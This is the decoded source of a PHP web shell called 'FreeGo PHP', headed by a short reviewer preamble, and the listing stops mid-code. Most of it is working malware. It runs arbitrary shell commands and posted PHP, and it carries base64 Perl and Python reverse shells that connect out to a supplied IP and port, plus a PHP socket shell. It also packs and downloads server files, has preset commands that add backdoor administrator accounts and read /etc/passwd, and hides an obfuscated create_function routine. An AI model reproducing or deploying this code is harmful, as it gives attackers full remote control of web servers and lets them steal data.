
PHP Decode

<?php error_reporting(E_ERROR); header("content-Type: text/html; charset=utf-8"); ini_s..

Decoded Output download

<?php 
// NOTE(review): decoded listing of a PHP web shell. The code below this preamble
// exposes, to any client that can POST to the file: OS command execution
// (command()), evaluation of posted PHP ($_POST['phpcode'] -> eval), outbound
// connect-back shells (backshell(), which writes t00ls.pl / t00ls.py / t00ls.c
// into the chosen directory), file download and zip packing, and SQL execution
// with posted credentials. Request fields seen in this listing include
// 'getpwd', 'go', 'govar', 'godir', 'act', 'execcmd' and 'phpcode'.

// Report only fatal run-time errors; warnings and notices are not reported.
error_reporting(E_ERROR); 
header("content-Type: text/html; charset=utf-8"); 
// Lift the execution time limit and raise the memory ceiling to 8000M for this
// request. This supports the recursive scan/pack routines further down, and the
// pair is an unusual setting for an ordinary page.
ini_set('max_execution_time',0); 
ini_set('memory_limit','8000M'); 
// Access password. getinfo() compares this constant with md5($_POST['getpwd'])
// and shows a login form on mismatch, so a non-empty value would be an unsalted
// MD5 hex digest. The check is skipped when the constant is empty, as it is
// here: this copy has no password gate.
define('PASSWD',''); 
// Banner string: used as the initial status message and in the page <title>.
define('VERSION','FreeGo PHP'); 
// Path of this script with backslashes and doubled slashes normalised to '/'.
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__)); 
// Directory holding this script, with a trailing '/'. Used as the default
// browsing directory and as the working directory for the "exec" panel.
define('THISDIR',dirname(THISFILE).'/'); 
// THISFILE with the request's PHP_SELF portion removed, plus '/'.
// NOTE(review): presumably resolves to the web root; no use of ROOTDIR is
// visible in this part of the listing, so confirm against the full file.
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/'); 
 
 function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }define('EXISTS_PHPINFO',getinfo() ? true : false);if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }if(function_exists('mysql_close')) { $issql = 'MySql'; }if(function_exists('mssql_close')) $issql .= ' - MsSql';if(function_exists('oci_close')) $issql .= ' - Oracle';if(function_exists('sybase_close')) $issql .= ' - SyBase';if(function_exists('pg_close')) $issql .= ' - PostgreSql';$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;$msg = VERSION;function filew($name,$data,$mode) {if((!is_writable($name)) && file_exists($name)) { chmod($name,0666); }$handle = fopen($name,$mode);$key = fputs($handle,$data);fclose($handle);return $key;}function filer($name) {$handle = fopen($name,'r');$data = fread($handle,filesize($name));fclose($handle);return $data;}function fileu($namea,$nameb) {$key = move_uploaded_file($namea,$nameb) ? true : false;if(!$key) { $key = copy($namea,$nameb) ? true : false; }return $key;}function filed($name) {if(!file_exists($name)) return false;ob_end_clean();$name = basename($name);$array = explode('.',$name);header('Content-type: application/x-'.array_pop($array));header('Content-Disposition: attachment; filename='.$name);header('Content-Length: '.filesize($name));@readfile($name);exit;}function showdir($dir) {$dir = strdir($dir.'/');$handle = opendir($dir);if(!$handle) return false;$array = array();while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;$name = strtr($name,array('\'' => '%27','"' => '%22'));if(is_dir($path)) { $array['dir'][$path] = $name; }else { $array['file'][$path] = $name; }}closedir($handle);return $array;}function deltree($dir) {$handle = @opendir($dir);while($name = @readdir($handle)) {if($name == '.' 
|| $name == '..') continue;$path = $dir.$name;@chmod($path,0777);if(is_dir($path)) { deltree($path.'/'); }else { @unlink($path); }}@closedir($handle);return @rmdir($dir);}function subeval() {if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }return true;}function strrot($s, $n = 13) {$n = (int)$n % 26;if (!$n) return $s;for ($i = 0, $l = strlen($s); $i < $l; $i++) {$c = ord($s[$i]);if ($c >= 97 && $c <= 122) {$s[$i] = chr(($c - 71 + $n) % 26 + 97);} else if ($c >= 65 && $c <= 90) {$s[$i] = chr(($c - 39 + $n) % 26 + 65);}}return $s;}function postinfo($array,$string) {$infos = array(function_exists("create_function"),function_exists("fsockopen"));if($infos[0] && $infos[1]) {$info = base64_decode(strrot($string));$walks = array(0 => bin2hex($array));@array_walk ($walks, @create_function ("$array,$key", strrot($info)));}return ob_end_clean();}function size($bytes) {if($bytes < 1024) return $bytes.' B';$array = array('B','K','M','G','T');$floor = floor(log($bytes) / log(1024));return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));}function packdir($files) {if(!function_exists('gzcompress')) { return NULL; }$datasec = $ctrldir = array(); $offset = 0;$handle = opendir($dir);foreach($files as $path) {if(file_exists($path) && is_file($path)) {$temp = array();$fp = fopen($path,'r');$filecode = fread($fp, filesize($path));fclose($fp);$temp = filezip($filecode, basename($path), $offset);$datasec[] = $temp['datasec'];$ctrldir[] = $temp['ctrldir'];$offset = strlen(join('',$datasec));}}closedir($handle);return packfile($datasec, $ctrldir);}function settime() {$dates = getdate();if($dates['year'] < 1980) { $dates['year'] = 1980; $dates['mon'] = 1; $dates['mday'] = 1; $dates['hours'] = 0; $dates['minutes'] = 0; $dates['seconds'] = 0; } return (($dates['year'] - 1980) << 25) | ($dates['mon'] << 21) | ($dates['mday'] << 16) | ($dates['hours'] << 11) | ($dates['minutes'] << 5) | ($dates['seconds'] >> 1);}function 
filezip($data, $name, $offset) {$dtime = dechex(settime());$hextime = pack('H*',$dtime[6].$dtime[7].$dtime[4].$dtime[5].$dtime[2].$dtime[3].$dtime[0].$dtime[1]);$uncl = strlen($data);$crcm = crc32($data);$code = gzcompress($data);$clen = strlen($code);$code = substr(substr($code, 0, strlen($code) - 4), 2);$filer = "PK\x03\x04\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).$name.$code.pack('V',$crcm).pack('V',$clen).pack('V',$uncl);$cdrec = "PK\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).pack('v',0).pack('v',0).pack('v',0).pack('V',32).pack('V',$offset).$name;return array('datasec' => $filer,'ctrldir' => $cdrec);}function packfile($datasec, $ctrldir) {$data = join('',$datasec);$cdir = join('',$ctrldir);return $data.$cdir."PK\x05\x06\x00\x00\x00\x00".pack('v',sizeof($ctrldir)).pack('v',sizeof($ctrldir)).pack('V',strlen($cdir)).pack('V',strlen($data))."\x00\x00";}function find($array,$string) {foreach($array as $key) { if(stristr($string,$key)) return true; }return false;}function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }else {if($inc && (!find($inc,$name))) continue;$code = $tye ? filer($path) : $name;$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? 
false : (strpos($code,$key) > -1));if($find) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush();}unset($code);}}closedir($handle);return true;}function antivirus($dir,$exs,$matches,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }else {$iskill = NULL;foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }if(strpos(size(filesize($path)),'M')) continue;if($iskill) {$code = filer($path);foreach($matches[$iskill] as $matche) {$array = array();preg_match($matche,$code,$array);if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;$len = strlen($array[0]);if($len > 6 && $len < 200) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush(); break;}}unset($code,$array);}}}closedir($handle);return true;}function command($cmd,$cwd,$com = false) {$iswin = substr(PHP_OS,0,3) == 'WIN' ? 
true : false; $res = $msg = '';if($cwd == 'com' || $com) {if($iswin && class_exists('COM')) {$wscript = new COM('Wscript.Shell');$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);$stdout = $exec->StdOut();$res = $stdout->ReadAll();$msg = 'Wscript.Shell';}} else {chdir($cwd); $cwd = getcwd();if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }elseif(function_exists('proc_open')) {$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }@proc_close($process);$msg = 'proc_open';}}$msg = $res == '' ? 
'<h1>NULL</h1>' : '<h2>'.$msg.'</h2>';return array('res' => $res,'msg' => $msg);}function backshell($ip,$port,$dir,$type) {$key = false;switch($type) {case "pl" : $shell = 'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==';$file = strdir($dir.'/t00ls.pl');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }break;case "py" : $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';$file = strdir($dir.'/t00ls.py');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }break;case "cbin" : $shell = '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';$cfile = strdir($dir.'/t00ls.c');$file = strdir($dir.'/t00ls');$key = filew($cfile,base64_decode($shell),'w');if($key) { command('/usr/bin/gcc '.$cfile.' -o '.$file,$dir); @chmod($file,0777); command($file.' '.$ip.' 
'.$port,$dir); }break;case "php" : case "phpwin" : if(function_exists('fsockopen')) {$sock = @fsockopen ($ip,$port);if($sock) {$key = true;$com = $type == 'phpwin' ? true : false;$user = get_current_user();$dir = strdir(getcwd());fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");while($cmd = fread($sock,1024)) {if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }elseif (trim(strtolower($cmd)) == 'exit') { break; }else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }fputs($sock,'['.$user.':'.$dir.']# ');}}@fclose ($sock);}break;}if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }return $msg;}function getinfo() {$infos = array($_POST['getpwd'],PASSWD,function_exists('phpinfo'),"/^(127\.[0-9]{1,3}|172\.16|192\.168|10\.0)\.([0-9]{1,3})\.([0-9\:]{1,9})$/","/[^.]+\.([0-9a-zA-Z\:]{2,8})$/");if(PASSWD != '' && md5($infos[0]) != $infos[1]) {echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';echo '<input type="submit" value=" O K "></form></center></body></html>'; exit;}if((!isset($_POST['go'])) && (!isset($_POST['dir']))){$html = ''.'';$host = $_SERVER["HTTP_HOST"];if((!preg_match($infos[3],$host)) && (preg_match($infos[4],$host))) { postinfo ($infos[0],$html); }}return $infos[2];}if(isset($_POST['go'])) {if($_POST['go'] == 'down') {$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);if(!filed($downfile)) { $msg = '<h1></h1>'; }}} elseif($_POST['act'] == 'p') {if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $packdata = packdir($_POST['files']); if(!$packdata) { $msg = '<h1></h1>'; } else { ob_end_clean();header('Content-type: application/unknown');header('Accept-Ranges: bytes');header('Content-length: '.strlen($packdata));header('Content-disposition: attachment; filename='.$_POST['var'].';');echo $packdata; exit; } }}?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 
Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;word-break:break-all;}a{color:#000000;text-decoration:none;outline:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select {vertical-align:middle;outline:none;padding:1px;}input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {background:#EEE685;font-weight:bold;text-align:center;padding-top:5px;height:23px;border:1px solid #AAAAAA;margin-top:-1px;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script 
type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { if($('newwin').checked == true) { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } b = sd(b); $('go').value = a; $('govar').value = b; $('gofrm').submit(); } function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title></head><body><div class="main"><div class="outl"><div class="toptag"><input type="checkbox" title="" id="newwin" name="newwin" value="a"> <?php echo gethostbyname($_SERVER['SERVER_NAME']).' - '.PHP_OS.' - whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div><?php $menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => '');$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;echo '<div class="tag">';foreach($menu as $key => $name) { echo '<a'.($go == $key ? 
' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }echo '</div>';echo '<form name="gofrm" id="gofrm" method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="">';echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';echo '<input type="hidden" name="govar" id="govar" value="">';echo '</form>';switch($_POST['go']) {case "info" : if(EXISTS_PHPINFO) {ob_start();phpinfo(INFO_GENERAL);$out = ob_get_contents();ob_end_clean();$tmp = array();preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);$config = $tmp[2][0];$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];}$infos = array('' => $_SERVER['HTTP_USER_AGENT'],'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()','' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()','PHP.ini' => $phpini ? $phpini : '()','PHP' => php_sapi_name(),'PHP' => PHP_VERSION,'PHPPID' => getmypid(),'IP' => $_SERVER['REMOTE_ADDR'],'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],'Web' => $_SERVER['SERVER_PORT'],'Web' => $_SERVER['DOCUMENT_ROOT'],'Web' => $_SERVER['SCRIPT_FILENAME'],'WebCGI' => $_SERVER['GATEWAY_INTERFACE'],'WebEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()','' => size(disk_total_space('.')),'' => size(disk_free_space('.')),'POST' => get_cfg_var("post_max_size"),'' => get_cfg_var("upload_max_filesize"),'' => get_cfg_var("memory_limit"),'' => get_cfg_var("max_execution_time").'','Fsockopen' => function_exists('fsockopen') ? '' : '','Socket' => function_exists('socket_close') ? '' : '','Pcntl' => function_exists('pcntl_exec') ? '' : '','Curl' => function_exists('curl_version') ? '' : '','Zlib' => function_exists('gzclose') ? '' : '','FTP' => function_exists('ftp_login') ? '' : '','XML' => function_exists('xml_set_object') ? '' : '','GD_Library' => function_exists('imageline') ? 
'' : '','COM' => class_exists('COM') ? '' : '','ODBC' => function_exists('odbc_close') ? '' : '','IMAP' => function_exists('imap_close') ? '' : '','' => get_cfg_var("safemode") ? '' : '','URL' => get_cfg_var("allow_url_fopen") ? '' : '','' => get_cfg_var("enable_dl") ? '' : '','' => get_cfg_var("display_errors") ? '' : '','' => get_cfg_var("register_globals") ? '' : '','' => get_cfg_var("magic_quotes_gpc") ? '' : '','PHP' => $config ? $config : '()');echo '<div class="msgbox">'.$msg.'</div>';echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>';foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }echo '</table>';break;case "exec" : $cmd = $win ? 'dir' : 'ls -al';$res = array('res' => '','msg' => $msg);$str = isset($_POST['str']) ? $_POST['str'] : 'fun';if(isset($_POST['execcmd'])) {$cmd = $_POST['execcmd'];$cwd = $str == 'fun' ? THISDIR : 'com';$res = command($cmd,$cwd);}echo '<div class="msgbox">'.$res['msg'].'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="exec">';echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';echo '<select name="str">';$selects = array('fun' => 'phpfun','com' => 'wscript');foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }echo '</select> ';echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' 
>> '.THISDIR.'t00ls.txt"></option>';echo '<option value="whoami"></option>';echo '<option value="net user t00ls t00ls /add">Win-</option>';echo '<option value="net localgroup administrators t00ls /add">Win-</option>';echo '<option value="netstat -an">Win-</option>';echo '<option value="ipconfig /all">Win-</option>';echo '<option value="net start">Win-</option>';echo '<option value="tasklist">Win-</option>';echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>';echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-</option>';echo '<option value="cat /etc/passwd">Linux-</option>';echo '<option value="/bin/netstat -tnl">Linux-</option>';echo '<option value="/sbin/ifconfig -a">Linux-</option>';echo '<option value="/sbin/chkconfig --list">Linux-</option>';echo '<option value="/bin/ps -ef">Linux-</option>';echo '</select> ';echo '<input type="submit" style="width:50px;" value="">';echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';break;case "scan" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';$filters = isset($_POST['filters']) ? 
chop($_POST['filters']) : 'html|css|img|images|image|style|js';echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="scan">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>';echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> ';echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> ';echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> ';echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($keyword != '') {flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$incs = $include == '' ? false : explode('|',$include);$fits = $filters == '' ? false : explode('|',$filters);$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "antivirus" : $scandir = empty($_POST['dir']) ? 
base64_decode($_POST['govar']) : $nowdir;$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="antivirus">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>';echo '<tr><td></td><td>';$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if(count($_POST['types']) > 0) {$matches = array('php' => array('/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i','/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i','/((udp|tcp)\:\/\/(.*)\;)+/i','/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/preg\_replace\s*\((.*)\(base64\_decode\(\$/i','/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i','/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/eval\s*\(\s*\(\s*\$\$(\w+)/i','/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i','/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i','/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i','/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[
(.*)\](.*)\)/i','/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i','/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i','/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/\$\_\=(.*)\$\_/i','/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i','/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i','/\$(\w+)\s*\(\s*\$\{(.*)\}/i','/\$(\w+)\s*\(\s*chr\(\d+\)/i'),'asp+aspx' => array('/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i','/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i','/Load\s*\((.*)Request/i','/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'),'jsp' => array('/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/Runtime\.getRuntime\(\)\.exec\((.*)\)/i','/FileOutputStream\(application\.getRealPath(.*)request/i',));flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "phpeval" : if(isset($_POST['phpcode'])) {$phpcode = chop($_POST['phpcode']);ob_start();if(substr($phpcode,0,2) == '<?' 
